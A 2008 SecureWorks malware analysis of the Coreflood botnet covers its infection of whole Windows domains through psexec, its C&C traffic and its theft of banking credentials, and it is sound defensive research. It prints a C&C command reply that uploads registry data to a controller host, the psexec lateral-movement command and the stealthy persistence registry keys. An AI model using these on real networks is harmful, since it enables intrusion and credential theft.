Coreflood/AFcore Trojan Analysis

• URL: http://www.secureworks.com/research/threats/coreflood
• Date: June 30, 2008
• Author: Joe Stewart, Director of Malware Research, SecureWorks

Highlights

1. One of the oldest botnets in continuous operation (+6 years)
2. Motive turned from DDoS to selling anonymity services to full-fledged bank fraud
3. Entire Windows domains infected at once (thousands of computers at some organizations)
4. Over 378,000 computers infected during 16-month time frame
5. Infected businesses, hospitals, government organizations, and even a state police agency

In the past several years we've seen many botnets come and have even seen some go. Some die because they are replaced by other code, some die (not often enough) because their owners go to jail. During this time, we've seen one botnet which has quietly flown under the radar since at least 2002. Coreflood (or "AF", as the author has dubbed it) started out as an internet relay chat (IRC) bot used for attacking other IRC users. Over time however, it evolved into a TCP proxy as part of an anonymity service, and then later into a full-fledged infostealer trojan. We wrote about the proxy component when it was first developed in 2003. Since that time Coreflood has maintained a much lower profile while other more prolific botnets came to the forefront of public attention. However, just recently the group behind Coreflood has escalated their activity and the trojan is beginning to be noticed again.

SecureWorks already had countermeasures in place for its clients to protect against the Coreflood Trojan and its variants and immediately notified research partners, anti-virus vendors and law enforcement officials upon discovering the scam. 

Coreflood is very recognizable if you've ever unpacked its code in a debugger - there are dozens of programmer-inserted debug strings in the trojan, which is quite unusual to see in malware. For instance, some of the strings found inside the unpacked binary:

Allocated new DLL path %s (pid: %d)
Registry key cannot be opened (%w)
Registry value will be reset in %d milliseconds
Setting registry notification handler . . .(%w)
Loaded DLL path %s from OCTOPUS_SHARED (pid: %d)
Stored DLL path %s stored into OCTOPUS_SHARED (pid: %d)
Loaded basename %s from DLL path %s (pid: %d)
Saving registry value %s (trailing characters %d and %d, length %d)
called check_registry with remove=1
comparing %s (%d) against %s (%d)
Socket cannot be allocated (%w) for %s+%h
Socket used by %s+%h cannot be deallocated (%w)
Requested amount of memory cannot be allocated (%E) for %s+%h
Memory block used by %s+%h cannot be reallocated (%E)
Memory block used by %s+%h cannot be deallocated (%E)
Looking up %s . . .
Resolved %s to %s; aliases: %s; addresses: %s
AF statistics:
Usage level of Windows Sockets: %d, peak: %d (errors: %d)
Allocated %d bytes in %d memory blocks (errors: %d)
No timers have been scheduled
Total %d timers have been scheduled. Time left:
%dwd %t - scheduled for %s+%h
No objects are being watched
Total %d objects are being watched. Handles:
%h - watched by %s+%h
Total bytes transmitted: %d, received: %d. End of AF statistics

It is clear that Coreflood is viewed by its author more like a corporate software project than a simple backdoor trojan. Fortunately, having seen some of these same strings years before, when we came across a new variant of the trojan recently, we were able to recognize it. Upon analysis however, we discovered the botnet was receiving commands related to banking sites, which is usually an indicator of infostealer/fraud activity.

To elaborate, here is a typical HTTP POST from Coreflood, checking in with its command-and-control server (C&C):

POST /c/a HTTP/1.0
Host: joy4host.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close

r=667&i=&v=3112&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=797&k=125&m=1432187&
panic=0&ie=237&input=237&c=United States&l=ENU

In response, the controller sends back a set of commands:

del ID; addto ID 3192784r667; setstr ID +S
http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\; 
Windows NT 5.1)" http #hosts +b "http #hosts +up /c/a usr=\\E\\u\\
E&wg=\\E\\vUSERDOMAIN=\\E&cn=\\E\\H\\E&i=3192784&v=3112&os=\\E\\O\\
E&s=\\E\\p\\E&h=\\E\\h\\E&d=\\d&b=\\b&u=\\Z&k=\\K&m=\\M&panic=\\
qpanic$&ie=\\qie$&input=\\qinput$&c=\\c&l=\\l"
http #hosts +I 180000
delfrom #hosts dreadent.info;addto $perform delfrom #hosts dreadent.info;setstr $perform +S
addto $perform log ie +Sm 6;addto $perform log other -Sm;addto $perform log input +S;setstr $perform +S
addto $perform setwnd 3 * *.pfx * +OM 4;addto $perform setwnd 4 * *.p12 * +OM 4;setstr $perform +S
setwnd 0 *https*example.com* * * +urfPMSW 4096 4 200000
addto $perform setwnd 8 * * * +pwclCME 60 1;addto $perform set +H;setstr $perform +S
setwnd 17 https://* * * +urfPMWK 4096 2
setwnd 18 * https://* * +urfPMWK 4096 2
http #hosts +I 600000
del upload_regorg;del regorg1;addto upload_regorg http +antrexhost.com:80 +LAWhuf 300000 
antrexhost.com /c/upload?file=regorg.txt&id=3192784 \\tregorg351.tmp;exec +regorg1 
-L+ac "\vcomspec= /c reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" 
/v RegisteredOrganization | findstr RegisteredOrganization > \tregorg351.tmp 
2> \tregorg352.tmp" "perfrm upload_regorg"

There are several instructions in the command reply. First, a unique ID is assigned to the bot, which it will use from this point on. A connectivity test to Microsoft is requested, followed by a format string that tells the bot where its future C&C requests should be sent and what variables should be sent. Next, the bot is instructed on what kinds of data to steal - in this case, data will be stored for "ie", "other" and "input". In addition, the code will be instructed to search for certain file types, namely *.pfx and *.p12 files - certificate files, which might be used for online banking. Also, any data sent to https sites will be logged, including example.com, which will be logged with a specific identifier for easier retrieval later. Finally, the controller asks the bot to find the Registered Organization entry from the registry and send it back to the controller. It seems the group behind Coreflood is very interested in what company owns the computer they have managed to infect.

With the help of Spamhaus we were able to get cooperation from one of the hosting companies where a Coreflood variant's C&C was hosted, to provide us with the back-end source code and any information about just how Coreflood was managing to infect computers. Quite unexpectedly we found all that, plus over 50 gigabytes of compressed data, stolen from hundreds of thousands of computers over the past two years. To top it off, the botnet uses a MySQL database to track all infected computers - giving us a statistical goldmine of data. Logged in the database were 378,758 unique bot IDs over a period of 16 months. Since the database tracks the initial infection timestamp along with the timestamp of each bot's last check-in, we were able to determine that the average lifespan of a Coreflood bot is 66 days.

Another thing we noticed in the database is that unusually large numbers of computers were infected in some companies. Since the database stores the date and time of infection and the last check-in time of each bot, it was possible to graph the infections over time. The results were quite startling - almost every organization we looked at had dramatic infection "events", where sometimes hundreds or thousands of computers were infected on the same day. This is inconsistent with what one usually sees when dealing with trojans, which have no way of spreading on their own. Historically, Coreflood has been spread via web exploit, which would not explain such massive infections inside a single company (unless their intranet web server had been used to host browser exploit code, which we entertained as one possibility).

Here are some of the graphs of the infections at different organizations over time:

Many more organizations were affected this way, including hospitals, universities and businesses. Eventually with the help of some of the network administrators we were able to piece together what had happened to cause these outbreaks. It works in the following manner:

1. First-stage trojan bot (not Coreflood) is installed via driveby browser exploit (NCT Audiofile2 ActiveX control)
2. Bot is instructed to download a copy of the Coreflood installer (here named ie1823en.exe, also we have seen wmedia106.exe) and another file, psexec.exe (or ps2exec.exe or ps3exec.exe) to the temporary directory.
3. Bot is instructed to execute the following command in Windows:

cmd /c $TMPDIR\ps2exec.exe \\* $TMPDIR\ie1823en.exe

PsExec is a legitimate Windows administration tool, which can be downloaded from Microsoft as part of the PsTools package developed by Sysinternals' Mark Russinovich. If the infected user has domain administrator privileges, the ie1823en.exe file is executed on every computer in the domain, infecting them with Coreflood.

The first-stage trojan installs itself to the windows\system32 directory and uses the registry key

software\Microsoft\Active Setup\Installed Components\{random alpha-only GUID}

in order to ensure that each time a user logs in for the first time the trojan will be activated. This is useful because it means that the trojan doesn't have to necessarily infect a domain administrator's workstation, it can infect any computer in the domain, and wait until an administrator logs in to fix some problem on the user's workstation, and then gain his/her privileges and spread to the rest of the computers on the network.
Coreflood itself has a unique method of startup - it uses the registry key.

software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers

This key is not well-known as a startup method and not always checked by anti-malware scanners. However, when Windows Explorer or Internet Explorer is started, this key is checked and any listed DLL (referenced by GUID) will be loaded into the process and initialized. For malware, this is similar to using a browser helper object (BHO) but without using the well-known BHO registry keys.

By being able to infect an entire Windows domain at once, the potential for corporate espionage seems limitless. In addition, some of the infected organizations are law enforcement entities - criminal investigations could even be compromised. However, currently the Coreflood group appears to be focused on collecting banking information, because much of the stolen data was compiled into directories with familiar bank names. However, should the criminals behind the operation discover there is money to be made in possessing credentials to other websites, they need only pull the saved data from the reams of collected data. Here is a sanitized excerpt of some of the data stolen from one user:

2007-11-05 22:14:29 Browser event: URL at 15 -> https://ts. example.com/

The following error was encountered:

.com/xxx/TS/index
.php
2007-11-05 22:14:35 Browser event: requested URL at 15 -> https://ts. example.com/ 
xxx/TS/login.php
2007-11-05 22:14:35 Browser event: content at 15 (276 bytes):

Your session has expired, please login again.

User Type:Manager
Employee

Username:
Password:

Submit
©2005Example, Inc. All Rights Reserved. Privacy Legal Contact Us PHP counter SOAP counters
2007-11-05 22:14:35 Browser event: cookie at 15 -> ARPT=xxx; PHPSESSID=xxx
2007-11-05 22:14:35 Browser event: input type at 15 -> radio
2007-11-05 22:14:35 Browser event: input name at 15 -> loginusertype
2007-11-05 22:14:35 Browser event: input value at 15 -> 0
2007-11-05 22:14:35 Browser event: input type=text at 15
2007-11-05 22:14:43 Browser event: input name at 15 -> username
2007-11-05 22:14:43 Browser event: input value at 15 -> xxx
2007-11-05 22:14:47 Browser event: input type=password at 15
2007-11-05 22:14:48 Browser event: input name at 15 -> password
2007-11-05 22:14:48 Browser event: input value at 15 -> xxx
2007-11-05 22:14:48 Browser event: URL at 15 -> -> https://ts. example.com/ 

/xxx/TS/login.php
2007-11-05 22:14:48 Browser event: requested URL at 15 -> https://ts.example.com/xxx/TS/login.php
2007-11-05 22:14:48 Browser event: post at 15 ->Submit=Submit&loginusertype=0&username=xxx&password=xxx

From this example, we can see that not only does the trojan capture usernames and passwords, but also grabs the text content of the page at the same time. This would allow the criminal to possibly find credentials that he/she may not have even realized was valuable, as well as giving a quick way to determine value of credentials for instance, by displaying the bank account balance of the infected user. Not having to log in to each account to determine its balance can be a huge time saver for a criminal. Although it would take a great deal of time to determine just how much money the Coreflood group has illicit access to, based on numbers seen in the database it is easily in the millions of dollars.

Removing Coreflood manually is possible by removing its entries under the registry keys above – however, it can be complicated in a Windows domain environment, as the act of logging in to clean a workstation may end up infecting other systems on the network. Care should be taken to block the network traffic to the controller before using domain administrator credentials to clean up the problem. At current, the known controller domains are mcupdate.net, joy4host.com and antrexhost.com.

Mitigating the problem of malware using domain administrator credentials is harder – it is not really possible to disable this feature without removing the ability of authorized users to remotely administer workstations entirely (including the ability to push needed updates to all computers in the domain). Malware using valid credentials to spread on a Windows network has been a problem for quite some time, however, in the past it usually meant brute-forcing of weak passwords. Malware authors have now realized that they only need to infect a computer that a domain administrator will use at some point. We've heard of cases of at least one other unrelated trojan using this method to propagate, so we expect to find increasing use of this technique in the future. It falls upon the domain administrator to be aware of this tactic and be increasingly aware of the security of not only his/her workstation, but any workstation accessed with administrator credentials.